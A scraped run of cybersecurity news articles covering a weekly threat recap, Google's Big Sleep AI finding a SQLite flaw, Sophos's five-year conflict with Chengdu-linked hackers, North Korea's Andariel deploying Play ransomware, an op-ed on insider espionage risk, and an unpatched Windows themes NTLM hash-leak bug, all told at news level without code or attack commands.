This week was a total digital dumpster fire! Hackers were like, "Let's cause some chaos!" and went after everything from our browsers to those fancy cameras that zoom and spin. (You know, the ones they use in spy movies? 🕵️‍♀️)
We're talking password-stealing bots, sneaky extensions that spy on you, and even cloud-hacking ninjas! 🥷 It's enough to make you want to chuck your phone in the ocean.

Weekly Recap / Cybersecurity

This week was a total digital dumpster fire! Hackers were like, "Let's cause some chaos!" and went after everything from our browsers to those fancy cameras that zoom and spin. (You know, the ones they use in spy movies? 🕵️‍♀️)

We're talking password-stealing bots, sneaky extensions that spy on you, and even cloud-hacking ninjas! 🥷 It's enough to make you want to chuck your phone in the ocean. (But don't do that, you need it to read this newsletter!)

The good news? We've got the inside scoop on all the latest drama. Think of this newsletter as your cheat sheet for surviving the digital apocalypse. We'll break down the biggest threats and give you the knowledge to outsmart those pesky hackers. Let's go!

****⚡ Threat of the Week****

**North Korean Hackers Deploy Play Ransomware:** In what's a sign of blurring boundaries between nation-state groups and cybercrime actors, it has emerged that the North Korean state-sponsored hacking crew called **Andariel** likely collaborated with the Play ransomware actors in a digital extortion attack that took place in September 2024. The initial compromise occurred in May 2024. The incident overlaps with an intrusion set that involved targeting three different organizations in the U.S. in August 2024 as part of a likely financially motivated attack.

 **Upgrade Your Cybersecurity Skills with SANS at CDI 2024 + Get a $1,950 Bonus!**

Unlock top-tier cybersecurity training at SANS CDI 2024, December 13-18 in Washington, DC. With over 40 expert-led courses, you'll gain practical skills and a $1,950 bonus, including extended lab access and a GIAC certification attempt when you train in-person! Offer ends November 11.

Boost Your Skills Now!****🔔 Top News****

*   **Chinese Threat Actor Uses Quad7 Botnet for Password Spraying:** A Chinese threat actor tracked by Microsoft as Storm-0940 is leveraging a botnet called Quad7 (aka CovertNetwork-1658) to orchestrate highly evasive password spray attacks. The attacks pave the way for the theft of credentials from multiple Microsoft customers, which are then used for infiltrating networks and conducting post-exploitation activities.
*   **Opera Fixed Bug That Could Have Exposed Sensitive Data:** A fresh browser attack named CrossBarking has been disclosed in the Opera web browser that compromises private application programming interfaces (APIs) to allow unauthorized access to sensitive data. The attack works by using a malicious browser extension to run malicious code in the context of sites with access to those private APIs. These sites include Opera's own sub-domains as well as third-party domains such as Instagram, VK, and Yandex.
*   **Evasive Panda Uses New Tool for Exfiltrating Cloud Data:** The China-linked threat actor known as Evasive Panda infected a government entity and a religious organization in Taiwan with a new post-compromise toolset codenamed CloudScout that allows for stealing data from Google Drive, Gmail, and Outlook. The activity was detected between May 2022 and February 2023.
*   **Operation Magnus Disrupts RedLine and MetaStealer:** A coordinated law enforcement operation led by the Dutch National Police led to the disruption of infrastructure associated with RedLine and MetaStealer malware. The effort led to the shut down of three servers in the Netherlands and the confiscation of two domains. In tandem, one unnamed individual has been arrested and a Russian named Maxim Rudometov has been charged for acting as one of RedLine Stealer's developers and administrators.
*   **Windows Downgrade Allows for Kernel-Level Code Execution:** New research has found that a tool that could be used to rollback an up-to-date Windows software to an older version could also be weaponized to revert a patch for a Driver Signature Enforcement (DSE) bypass and load unsigned kernel drivers, leading to arbitrary code execution at a privileged level. Microsoft said it's developing a security update to mitigate this threat.

****‎️‍🔥 Trending CVEs****

CVE-2024-50550, CVE-2024-7474, CVE-2024-7475, CVE-2024-5982, CVE-2024-10386, CVE-2023-6943, CVE-2023-2060, CVE-2024-45274, CVE-2024-45275, CVE-2024-51774

****📰 Around the Cyber World****

*   **Security Flaws in PTZ Cameras:** Threat actors are attempting to exploit two zero-day vulnerabilities in pan-tilt-zoom (PTZ) live streaming cameras used in industrial, healthcare, business conferences, government, religious places, and courtroom settings. Affected cameras use VHD PTZ camera firmware < 6.3.40, which is found in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. The vulnerabilities, tracked as CVE-2024-8956 and CVE-2024-8957, enable threat actors to crack passwords and execute arbitrary operating system commands, leading to device takeover. "An attacker could potentially seize full control of the camera, view and/or manipulate the video feeds, and gain unauthorized access to sensitive information," GreyNoise said. "Devices could also be potentially enlisted into a botnet and used for denial-of-service attacks." PTZOptics has issued firmware updates addressing these flaws.
*   **Multiple Vulnerabilities in OpenText NetIQ iManager:** Nearly a dozen flaws have been disclosed in OpenText NetIQ iManager, an enterprise directory management tool, some of which could be chained together by an attacker to achieve pre-authentication remote code execution, or allow an adversary with valid credentials to escalate their privileges within the platform and ultimately achieve post-authenticated code execution. The shortcomings were addressed in version 3.2.6.0300 released in April 2024.
*   **Phish 'n' Ships Uses Fake Shops to Steal Credit Card Info:** A "sprawling" fraud scheme dubbed Phish 'n' Ships has been found to drive traffic to a network of fake web shops by infecting legitimate websites with a malicious payload that's responsible for creating bogus product listings and serving these pages in search engine results. Users who click on these phony product links are redirected to a rogue website under the attacker's control, where they are asked to enter their credit card information to complete the purchase. The activity, ongoing since 2019, is said to have infected more than 1,000 websites and built 121 fake web stores in order to deceive consumers. "The threat actors used multiple well-known vulnerabilities to infect a wide variety of websites and stage fake product listings that rose to the top of search results," HUMAN said. "The checkout process then runs through a different web store, which integrates with one of four payment processors to complete the checkout. And though the consumer's money will move to the threat actor, the item will never arrive." Phish 'n' Ships has some elements in common with BogusBazaar, another criminal e-commerce network that came to light earlier this year.
*   **Funnull Behind Scam Campaigns and Gambling Sites:** Funnull, the Chinese company that acquired Polyfill\[.\]io JavaScript library earlier this year, has been linked to investment scams, fake trading apps, and suspect gambling networks. The malicious infrastructure cluster has been codenamed Triad Nexus. In July, the company was caught inserting malware into polyfill.js that redirected users to gambling websites. "Prior to the polyfill\[.\]io supply chain campaign, ACB Group – the parent company that owns Funnull's CDN – had a public webpage at 'acb\[.\]bet,' which is currently offline," Silent Push said. "ACB Group claims to own Funnull\[.\]io and several other sports and betting brands."
*   **Security Flaws Fixed in AC charging controllers:** Cybersecurity researchers have discovered multiple security shortcomings in the firmware of Phoenix Contact CHARX SEC-3100 AC charging controllers that could allow a remote unauthenticated attacker to reset the user-app account's password to the default value, upload arbitrary script files, escalate privileges, and execute arbitrary code in the context of root. The

**🔥 **Resources, Guides & Insights********🎥 Expert Webinar****

**Learn LUCR-3's Identity Exploitation Tactics and How to Stop Them —** Join our exclusive webinar with Ian Ahl to uncover LUCR-3's advanced identity-based attack tactics targeting cloud and SaaS environments.

Learn practical strategies to detect and prevent breaches, and protect your organization from these sophisticated threats. Don't miss out—register now and strengthen your defenses.

****🔧 Cybersecurity Tools****

*   **SAIF Risk Assessment** — Google introduces the SAIF Risk Assessment, an essential tool for cybersecurity professionals to enhance AI security practices. With tailored checklists for risks such as Data Poisoning and Prompt Injection, this tool translates complex frameworks into actionable insights and generates instant reports on vulnerabilities in your AI systems, helping you address issues like Model Source Tampering.
*   CVEMap — A new user-friendly tool for navigating the complex world of Common Vulnerabilities and Exposures (CVE). This command-line interface (CLI) tool simplifies the process of exploring various vulnerability databases, allowing you to easily access and manage information about security vulnerabilities.

****🔒 Tip of the Week****

**Essential Mobile Security Practices You Need** — To ensure robust mobile security, prioritize using open-source apps that have been vetted by cybersecurity experts to mitigate hidden threats. Utilize network monitoring tools such as **NetGuard** or **AFWall+** to create custom firewall rules that restrict which apps can access the internet, ensuring only trusted ones are connected. Audit app permissions with advanced permission manager tools that reveal both background and foreground access levels. Set up a DNS resolver like **NextDNS** or **Quad9** to block malicious sites and phishing attempts before they reach your device. For secure browsing, use privacy-centric browsers like **Firefox Focus** or **Brave**, which block trackers and ads by default. Monitor device activity logs with tools like **Syslog Viewer** to identify unauthorized processes or potential data exfiltration. Employ secure app sandboxes, such as **Island** or **Shelter**, to isolate apps that require risky permissions. Opt for apps that have undergone independent security audits and use VPNs configured with **WireGuard** for low-latency, encrypted network connections. Regularly update your firmware to patch vulnerabilities and consider using a mobile OS with security-hardening features, such as **GrapheneOS** or **LineageOS**, to limit your attack surface and guard against common exploits.

****Conclusion****

And that's a wrap on this week's cyber-adventures! Crazy, right? But here's a mind-blowing fact: Did you know that every 39 seconds, there's a new cyberattack somewhere in the world? Stay sharp out there! And if you want to become a true cyber-ninja, check out our website for the latest hacker news. See you next week! 👋

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Recap: Top Cybersecurity Threats, Tools, and Practices (Oct 28 - Nov 03)

Google said it discovered a zero-day vulnerability in the SQLite open-source database engine using its large language model (LLM) assisted framework called Big Sleep (formerly Project Naptime).
The tech giant described the development as the "first real-world vulnerability" uncovered using the artificial intelligence (AI) agent.
"We believe this is the first public example of an AI agent finding

Artificial Intelligence / Vulnerability

Google said it discovered a zero-day vulnerability in the SQLite open-source database engine using its large language model (LLM) assisted framework called **Big Sleep** (formerly Project Naptime).

The tech giant described the development as the "first real-world vulnerability" uncovered using the artificial intelligence (AI) agent.

"We believe this is the first public example of an AI agent finding a previously unknown exploitable memory-safety issue in widely used real-world software," the Big Sleep team said in a blog post shared with The Hacker News.

The vulnerability in question is a stack buffer underflow in SQLite, which occurs when a piece of software references a memory location prior to the beginning of the memory buffer, thereby resulting in a crash or arbitrary code execution.

"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used," according to a Common Weakness Enumeration (CWE) description of the bug class.

Following responsible disclosure, the shortcoming has been addressed as of early October 2024. It's worth noting that the flaw was discovered in a development branch of the library, meaning it was flagged before it made it into an official release.

Project Naptime was first detailed by Google in June 2024 as a technical framework to improve automated vulnerability discovery approaches. It has since evolved into Big Sleep, as part of a broader collaboration between Google Project Zero and Google DeepMind.

With Big Sleep, the idea is to leverage an AI agent to simulate human behavior when identifying and demonstrating security vulnerabilities by taking advantage of an LLM's code comprehension and reasoning abilities.

This entails using a suite of specialized tools that allow the agent to navigate through the target codebase, run Python scripts in a sandboxed environment to generate inputs for fuzzing, and debug the program and observe results.

"We think that this work has tremendous defensive potential. Finding vulnerabilities in software before it's even released, means that there's no scope for attackers to compete: the vulnerabilities are fixed before attackers even have a chance to use them," Google said.

The company, however, also emphasized that these are still experimental results, adding "the position of the Big Sleep team is that at present, it's likely that a target-specific fuzzer would be at least as effective (at finding vulnerabilities)."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google’s AI Tool Big Sleep Finds Zero-Day Vulnerability in SQLite Database Engine

The sophisticated Chinese cyberattacks of today rest on important groundwork laid during the pandemic and before.

Source: Cinematic via Alamy Stock Photo

Chinese threat actors are operating at a higher level today than ever before, thanks to years of trial-and-error-style attacks against mass numbers of edge devices.

Networking devices are a known favorite of China's advanced persistent threats (APT), and why wouldn't they be? Sitting on the outer banks of an enterprise network, they not only allow threat actors a way in, they also double as useful nodes for botnets. They offer opportunities for lateral movement, they often store sensitive data, and network defenders have a harder time seeing into and securing them than they do other kinds of network computers. 

Over time, Chinese APTs have been improving on their edge attack capabilities. Since 2018, Sophos has traced a distinct evolution in tactics: from naive, low-level attacks came more sophisticated campaigns against massive numbers of devices, followed by a period of more targeted attacks against specific organizations.

**The First Salvo in a Long Cyber War**

On Dec. 4, 2018, Sophos analysts discovered a suspicious device running network scans against Cyberoam, a Sophos subsidiary based in India. In some ways the attack was run of the mill, using commodity malware and common living-off-the-land (LotL) tactics.

Other evidence, though, suggested that this was something different. For example, the attacker utilized a novel technique to pivot from on-premises devices to the cloud, via an overly permissive identity and access management (IAM) configuration to the Amazon Web Services Systems Manager (AWS SM).

Related:Dark Reading News Desk Live From Black Hat USA 2024

"AWS SM was quite a new technology, and it was quite a subtle misconfiguration," Sophos chief information security officer (CISO) Ross McKerchar recalls. "That was one of the first indicators that we were up against an interesting adversary." 

Later, the attackers deployed a novel rootkit called Cloud Snooper. Cloud Snooper was so stealthy that two third-party consultancies missed it in their analysis, before Sophos eventually picked up on its presence.

The goal of the attack, it seemed, was to collect information useful for future attacks against edge devices. It was a harbinger of what was to come.

**A Five-Year Evolution in Chinese TTPs**

Chinese cyber threats blossomed from roughly 2020 to 2022, as attackers focused on identifying and breaching edge devices en masse.

It worked thanks to the large quantity of devices in the wild that have Internet-facing portals. Typically, these interfaces are designed for internal use. With COVID-19, though, more and more companies were allowing employees to connect from the open Web. This provided a window for hackers with the right kind of credentials or vulnerabilities to get in.

Related:The Overlooked Importance of Identifying Riskiest Users

It helped, too, that around that same time — July 2021 — China's Cyberspace Administration passed the Regulations on the Management of Network Product Security Vulnerability Information rules. These mandates forced cybersecurity researchers to report vulnerabilities to the country's Ministry of Industry and Information Technology (MIIT) before disclosing to any other parties. "It was designed to co-opt the whole country — private citizens included — into being assets for PRC objectives," McKerchar says. Sophos argues with medium confidence that two notable campaigns during this period were facilitated by vulnerabilities responsibly disclosed by researchers at universities in the Chinese city of Chengdu.

Chinese APTs weren't only interested in using compromised devices to attack the companies from whence they came. With varying degrees of success, they would often try to incorporate the devices into broader operational relay box networks (ORBs). These ORBs, in turn, offered higher-level threat actors more sophisticated infrastructure from which to launch more advanced attacks and hide any trace of their origin.

Related:FBI, Partners Disrupt RedLine, Meta Stealer Operations

**What's Happening Now**

After this noisy period, around the middle of 2022, Chinese APTs shifted yet again. Ever since, they've been focused on much more deliberate and targeted attacks against organizations of high value: government agencies, military contractors, research and development firms, critical infrastructure providers, and the like.

These attacks follow no single pattern, involving known and zero-day vulnerabilities, userl and and UEFI bootkits, and whatever other elements pair with active, hands-on-keyboard-type attacks. They almost certainly wouldn't be as sophisticated as they are, though, without all of the years of trial and error that occurred before. Evidence to that is just how effective these threat actors are at overcoming cybersecurity defenses. In recent years, they've demonstrated an ability to sabotage hotfixes for vulnerable devices, and block evidence of their activity from reaching Sophos analysts.

"There's a clear arc of moving to stealthier and stealthier persistence in the activity that we've uncovered," McKerchar says.

He explains how "the first malware, whilst it was bespoke for our devices, it wasn't really trying to hide. They were just banking on nobody looking. In the second wave of attacks they learned a bunch of lessons, remarkably quickly. The malware wasn't explicitly trying to hide, it was just smaller, and naturally able to blend in a bit more. Then after that, they started kind of pulling out more interesting tactics: Trojan class files, memory-resident malware, rootkits, bootkits."

He concludes, "It'd be hard to speculate on what's next, except \[that\] they're going to be improving again."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Chinese APTs Cash In on Years of Edge Device Attacks

As organizations centralize IT security, the risk of espionage is silently becoming a more profitable threat.

Source: Cagkan Sayin via Alamy Stock Photo

COMMENTARY

In recent years, large-scale financial and reputational damages have taught organizations the value of IT security. From corporations to universities, many organizations employ advanced security measures, such as implementing multifactor authentication, conducting regular ISO 27001 audits, providing social engineering training, and even conducting penetration tests and red-team exercises. Beyond this, to prevent unaffiliated devices from roaming freely in their networks, many organizations ask individuals to register their devices and apply security policies on them, such as using complex passwords. 

This is where the game suddenly changes: Security decisions being centralized completely to the organization's IT team poses significant risks. Specifically, our key argument is that this issue will likely increase the use of espionage techniques to compromise systems. 

Consider the following scenario: An executive of a large organization enrolls in a part-time master's program. To access university resources and emails, she connects her personal Windows laptop to the university's network (i.e., Settings > Accounts > Access work or school). Now, her laptop is managed by the university's mobile device management (MDM) system. If she asks about this, the IT team will assure her that this setup is mainly for ensuring updates and strong password policies — and this is all true. 

But what she probably will not be told is that now they have the technical capability to do much more. Many IT teams self-impose limitations on what they can do bring-your-own-device (BYOD) situations to respect user privacy. However, these limitations are policy-based and can easily be reconfigured by a rogue employee. For instance, if such an individual decides to install a program, wipe her disks, or run a script to steal her files, they can adjust the MDM policies to do so. Worse yet, an IT team member who has gone rogue is not only able to do anything she can do on her machine but can also do anything she can do on her company's network. 

**Risk Across Sectors**

While we used the example of a university in this case, obviously this scenario is not limited to educational institutions; The same risks exist across sectors such as healthcare, corporations, and even gaming. Whenever an IT team is allowed to centrally control IT security, such as through an MDM system, there is potential for abuse. 

Given this, traditional espionage techniques — in particular, planting an employee into the IT team or broader organization — become a viable model for criminal enterprises. In fact, unlike most other criminal endeavors that offer similar levels of potential monetary gains (e.g., stealing from a bank), this is not only less risky but also requires much less personnel (e.g., just one individual who deceives their way into the IT team). 

This is because, in most cases, espionage completely bypasses security controls, by capitalizing on the trust placed in IT teams. In contrast, trying to hack into a hardened system comes with all kinds of hurdles. For instance, you can try to use a zero-day exploit, but it would cost exorbitant amounts of money. Exploit brokers such as Zerodium pay large sums (e.g., $2.5 million) to buy a zero-day, and then add their profits to the sum while selling it. In contrast, the price of planting a spy, especially within a lower-risk environment like a school or public hospital, is significantly lower. Furthermore, planting a spy in the organization can provide information and access for extended periods. 

Therefore, this trend toward centralized IT control makes the use of industrial spies a more profitable and less risky proposition. After all, how many organizations — let alone universities, schools, or public hospitals — can effectively root out a highly trained professional spy embedded within their IT team? 

Furthermore, this centralization trend is expanding beyond enterprise environments. For example, many multiplayer games employ anti-cheating measures that operate at the kernel level, granting full access to the gaming company's IT team. One way to hack hundreds of thousands of users, therefore, is hiring a sophisticated team of hackers to reverse engineer the anti-cheat engine for countless hours to find a zero-day vulnerability. Generally, though, planting someone into the gaming company is a much cheaper alternative. 

**How Do We Design Our Systems Better?**

In response, we need to improve the design of our systems in at least three ways.

*   First, systems must be designed with decentralization in mind; highly centralized systems come with the threat of a single point of critical failure.
    
*   Second, information security should not be confined to IT teams; we have to embed the zero-trust mindset into all organizational functions, ranging from HR (e.g., recruitment practices) to managerial decision-making.
    
*   Finally, for IT admins today, the top-level concern is the breach of the servers and domain controllers. However, unwarranted access to personal devices must become another top concern beyond the compromise of the organization's own servers. 
    

Ultimately, we must recognize that the centralization of IT security elevates espionage to a critical threat, marking the next phase in the evolution of information security. 

**About the Authors**

Reader (Associate Professor) in Digital Innovation and Information Security, King's College London

Aybars Tuncdogan is a reader (associate professor) in digital innovation and information security at King’s College London. He is also a research affiliate of the King’s AI Institute and a member of both the Cybersecurity Research Centre (King’s Informatics Department) and the Cyber Security Research Group (King’s War Studies Department). 

Lecturer (Assistant Professor) in Marketing, University of Sussex

Fulya Acikgoz is a lecturer (assistant professor) in marketing at the University of Sussex. Her research covers a wide range of topics with a particular focus on technology and innovation marketing and management in different contexts. Her work has been published in high-impact journals. She is also the co-author of the book Blockchain for Tourism and Hospitality Industries.

IT Security Centralization Makes the Use of Industrial Spies More Profitable

The prominent state-sponsored advanced persistent threat (APT), aka Jumpy Pisces, appears to be moving away from its primary cyber-espionage motives and toward wreaking widespread disruption and damage.

Source: DD Images via Shutterstock

One of North Korea's most prominent state-sponsored threat groups has pivoted to using Play ransomware in recent attacks, signifying the first time the group has partnered up with an underground ransomware network. Worryingly, it sets the stage for future high-impact attacks, researchers surmise.

According to Palo Alto Networks' Unit 42, which tracks the advanced persistent threat (APT) as Jumpy Pisces (aka Nickel Hyatt, Onyx Sleet, Silent Chollima, Stonefly, and TDrop2), Andariel is now working with the Play ransomware gang, but whether it's as an initial access broker (IAB) or affiliate of the ransomware group is not clear, the researchers observed in a blog post on Oct. 31. Previously, Andariel was associated with a ransomware strain called "Maui" that's been active since at least 2022.

Unit 42 researchers believe the group is responsible for a Play ransomware attack discovered last month in which attackers gained initial access to a network via a compromised user account several months before, in May. Andariel moved laterally after its initial network breach and maintained persistence by spreading the open source tool Sliver and its unique custom malware, DTrack, to other hosts via the Server Message Block (SMB) protocol, according to Unit 42. Months later, in early September, it deployed the Play payload.

Related:Cybersecurity Training Resources Often Limited to Developers

"This shift in their tactics, techniques and procedures (TTPs) signals deeper involvement in the broader ransomware threat landscape," Unit 42 researchers wrote in the post. "This development could indicate a future trend where North Korean threat groups will increasingly participate in broader ransomware campaigns, potentially leading to more widespread and damaging attacks globally."

**Ransomware in Transition?**

Play ransomware, maintained and deployed by a group tracked as Fiddling Scorpius, made its claim to fame by targeting the city of Oakland, Calif., in February 2023 with a crippling attack. It then quickly rose up the threat ranks to become a major player in the game.

Some researchers have suggested that Fiddling Scorpius has transitioned from mounting its own attacks to a ransomware-as-a-service (RaaS) model, according to Unit 42. However, the group itself has announced on its Play ransomware leak site that it does not provide a RaaS ecosystem, according to the researchers. If this is true, then Andariel most likely acted as an IAB in the attack rather than an affiliate, they said.

Either way, "network defenders should view … \[the\] activity as a potential precursor to ransomware attacks, not just espionage, underscoring the need for heightened vigilance," according to Unit 42.

Related:Codasip Donates Tools to Develop Memory-Safe Chips

There were several clues in the attack sequence that point to collaboration between Andariel and the Play ransomware. For one, the compromised account that attackers used for initial access and subsequent spreading of Andariel's signature tools, including Silver and Dtrack, was the same one used prior to ransomware deployment.

"The ransomware actor leveraged the account to abuse Windows access tokens, move laterally and escalate to SYSTEM privileges via PsExec," according to the post. "This eventually led to the mass uninstallation of endpoint detection and response (EDR) sensors and the onset of Play ransomware activity."

The researchers also observed command-and-control (C2) communication with the Silver malware the day before Play ransomware was deployed. Moreover, Play ransomware attacks are known for leaving tools in the in the folder C:\\Users\\Public\\Music, and some tools used prior to ransomware deployment in the Andariel attack also were located there, the researchers noted.

**Defenders Beware Rising North Korean Ransomware Threat**

Andariel has been active for several years and has mounted a number of high-profile attacks that have targeted critical defense, aerospace, nuclear, and engineering companies as well as global managed service providers.

Related:Samsung Zero-Day Vuln Under Active Exploit, Google Warns

Andariel is controlled by North Korea's military intelligence agency, the Reconnaissance General Bureau, which is involved in the nation's illicit arms trade and responsible for its malicious cyber activity. The group's antics already have drawn the attention of international law enforcement, including the US National Security Agency (NSA), which considers the group an ongoing threat to various industry sectors, particularly in the US, South Korea, Japan, and India.

The US Department of State's Rewards for Justice (RFJ) is even offering a reward of up to $10 million for information that could lead it to Rim Jong Hyok, a key player in Andariel's management structure, or any co-conspirators in the group.

Given the need for worldwide organizations to be on alert, Unit 42 included a list of indicators of compromise (IoCs) in its blog post. The researchers advised that defenders leverage the latest threat intelligence to identify malware on networks, and advanced URL filtering and DNS security products to spot known URLs and domains associated with Andariel's malicious activity.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

North Korea's Andariel Pivots to 'Play' Ransomware Games

Sophos went so far as to plant surveillance “implants” on its own devices to catch the hackers at work—and in doing so, revealed a glimpse into China's R&D pipeline of intrusion techniques.

For years, it's been an inconvenient truth within the cybersecurity industry that the network security devices sold to protect customers from spies and cybercriminals are, themselves, often the machines those intruders hack to gain access to their targets. Again and again, vulnerabilities in “perimeter” devices like firewalls and VPN appliances have become footholds for sophisticated hackers trying to break into the very systems those appliances were designed to safeguard.

Now one cybersecurity vendor is revealing how intensely—and for how long—it has battled with one group of hackers that have sought to exploit its products to their own advantage. For more than five years, the UK cybersecurity firm Sophos engaged in a cat-and-mouse game with one loosely connected team of adversaries who targeted its firewalls. The company went so far as to track down and monitor the specific devices on which the hackers were testing their intrusion techniques, surveil the hackers at work, and ultimately trace that focused, years-long exploitation effort to a single network of vulnerability researchers in Chengdu, China.

On Thursday, Sophos chronicled that half-decade-long war with those Chinese hackers in a report that details its escalating tit-for-tat. The company went as far as discreetly installing its own “implants” on the Chinese hackers' Sophos devices to monitor and preempt their attempts at exploiting its firewalls. Sophos researchers even eventually obtained from the hackers' test machines a specimen of “bootkit” malware designed to hide undetectably in the firewalls' low-level code used to boot up the devices, a trick that has never been seen in the wild.

In the process, Sophos analysts identified a series of hacking campaigns that had started with indiscriminate mass exploitation of its products but eventually became more stealthy and targeted, hitting nuclear energy suppliers and regulators, military targets including a military hospital, telecoms, government and intelligence agencies, and the airport of one national capital. While most of the targets—which Sophos declined to identify in greater detail—were in South and Southeast Asia, a smaller number were in Europe, the Middle East, and the United States.

Sophos' report ties those multiple hacking campaigns—with varying levels of confidence—to Chinese state-sponsored hacking groups including those known as APT41, APT31, and Volt Typhoon, the latter of which is a particularly aggressive team that has sought the ability to disrupt critical infrastructure in the US, including power grids. But the common thread throughout those efforts to hack Sophos' devices, the company says, is not one of those previously identified hackers groups but instead a broader network of researchers that appears to have developed hacking techniques and supplied them to the Chinese government. Sophos' analysts tie that exploit development to an academic institute and a contractor, both around Chengdu: Sichuan Silence Information Technology—a firm previously tied by Meta to Chinese state-run disinformation efforts—and the University of Electronic Science and Technology of China.

Sophos says it’s telling that story now not just to share a glimpse of China's pipeline of hacking research and development, but also to break the cybersecurity industry's awkward silence around the larger issue of vulnerabilities in security appliances serving as entry points for hackers. In just the past year, for instance, flaws in security products from other vendors including Ivanti, Fortinet, Cisco, and Palo Alto have all been exploited in mass hacking or targeted intrusion campaigns. “This is becoming a bit of an open secret. People understand this is happening, but unfortunately everyone is _zip,_” says Sophos chief information security officer Ross McKerchar, miming pulling a zipper across his lips. “We're taking a different approach, trying to be very transparent, to address this head-on and meet our adversary on the battlefield.”

**From One Hacked Display to Waves of Mass Intrusion**

As Sophos tells it, the company's long-running battle with the Chinese hackers began in 2018 with a breach of Sophos itself. The company discovered a malware infection on a computer running a display screen in the Ahmedabad office of its India-based subsidiary Cyberoam. The malware had gotten Sophos' attention due to its noisy scanning of the network. But when the company's analysts looked more closely, they found that the hackers behind it had already compromised other machines on the Cyberoam network with a more sophisticated rootkit they identified as CloudSnooper. In retrospect, the company believes that initial intrusion was designed to gain intelligence about Sophos products that would enable follow-on attacks on its customers.

Then in the spring of 2020, Sophos began to learn about a broad campaign of indiscriminate infections of tens of thousands of firewalls around the world in an apparent attempt to install a trojan called Asnarök and create what it calls “operational relay boxes” or ORBs—essentially a botnet of compromised machines the hackers could use as launching points for other operations. The campaign was surprisingly well resourced, exploiting multiple zero-day vulnerabilities the hackers appeared to have discovered in Sophos appliances. Only a bug in the malware's cleanup attempts on a small fraction of the affected machines allowed Sophos to analyze the intrusions and begin to study the hackers targeting its products.

Inside Sophos' 5-Year War With the Chinese Hackers Hijacking Its Devices

Now a zero-day, the vulnerability enables NTLM hash theft, an issue that Microsoft has already fixed twice before.

Source: tdhster via Shutterstock

All versions of Windows clients, from Windows 7 through current Windows 11 versions, contain a 0-day vulnerability that could allow attackers to capture NTLM authentication hashes from users of affected systems.

Researchers at ACROS Security reported the flaw to Microsoft this week. They discovered the issue while writing a patch for older Windows systems for CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft mitigated in its July security update.

**Variant of Two Previous Vulnerabilities**

The vulnerability that ACROS discovered is very similar to CVE-2024-38030 and enables what is known as an authentication coercion attack, where a vulnerable device is essentially coerced into sending NTLM hashes — the cryptographic representation of a user's password — to an attacker's system. Akamai researcher Tomer Peled discovered CVE-2024-38030 while analyzing Microsoft's fix for CVE-2024-21320, another, earlier Windows themes spoofing vulnerability he discovered and reported to Microsoft. The flaw that ACROS uncovered is a new, separate vulnerability related to the two flaws Peled reported earlier.

Windows themes files allow users to customize the appearance of their Windows desktop interface via wallpapers, screen savers, colors, and sounds. Both the vulnerabilities that Akamai researcher Peled discovered had to do with the manner in which the themes handled file paths to a couple of image resources, specifically "BrandImage" or "Wallpaper." Peled found that because of improper validation, an attacker could manipulate the legitimate path to these resources in such a way as to get Windows to automatically send an authenticated request, along with the user's NTLM hash, to the attacker's device.

As Peled explains to Dark Reading, "The themes file format is an .ini file, with multiple 'key,value' pairs. I originally found two key,value pairs that could accept file paths," he says.

The original vulnerability (CVE-2024-21320) stemmed from the fact that the key,value pairs accepted UNC paths — a standardized format for identifying network resources like shared files and folders — for network drives, Peled notes. "This \[meant\] that a weaponized theme file, with a UNC path, could trigger an outbound connection with user authentication, without them knowing." Microsoft fixed the issue by adding a check on the file path to ensure it wasn't a UNC path. But, Peled says, the function Microsoft used for this validation allowed for some bypasses, which is what led to Peled's discovery of the second vulnerability (CVE-2024-38030).

**Microsoft Will Act 'As Needed'**

What ACROS Security reported this week is the third Windows themes spoofing vulnerability rooted in the same file path issue. "Our researchers discovered the vulnerability in early October while writing a patch for CVE-2024-38030 intended for legacy Windows systems many of our users are still using," says Mitja Kolsek, CEO of ACROS Security. "We reported this issue to Microsoft \[on\] Oct. 28, 2024, but we did not release details or a proof-of-concept, which we plan to do after Microsoft has made their own patch publicly available."

A Microsoft spokesman said via email the company is aware of the ACROS report and "will take action as needed to help keep customers protected." The company does not appear to have issued a CVE, or vulnerability identifier, for the new issue yet.

Like the two previous Windows themes spoofing vulnerabilities that Akamai discovered, the new one that ACROS found also does not require an attacker to have any special privileges. "But they have to somehow get the user to copy a theme file to some other folder on their computer, then open that folder with Windows Explorer using a view that renders icons," Kolsek says. "The file could also be automatically downloaded to their Downloads folder while visiting \[an\] attacker's website, in which case the attacker would have to wait for the user to view the Downloads folder at a later time."

Kolsek recommends that organizations disable NTLM where possible, but acknowledges that doing so could cause functional problems if any network components rely on it. "\[An\] attacker could only successfully target a computer where NTLM is enabled," he says. "Another requirement is that a request initiated by a malicious theme file would be able to reach the attacker's server on the Internet or in an adjacent network," something that firewalls should typically block, he says. As a result, it's more likely than an attacker would try to exploit the flaw in a targeted campaign more so than in a mass exploit.

Akamai's Peled says it's hard to know what ACROS's vulnerability is about without having access to the technical details. "But it might be another UNC bypass that circumvents the check, or it could be a different key,value pair that was missed in the original patching," he says. "UNC path formats are very complex and allow for weird combinations, which make detecting them very hard. This might be why it's so complex to fix."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

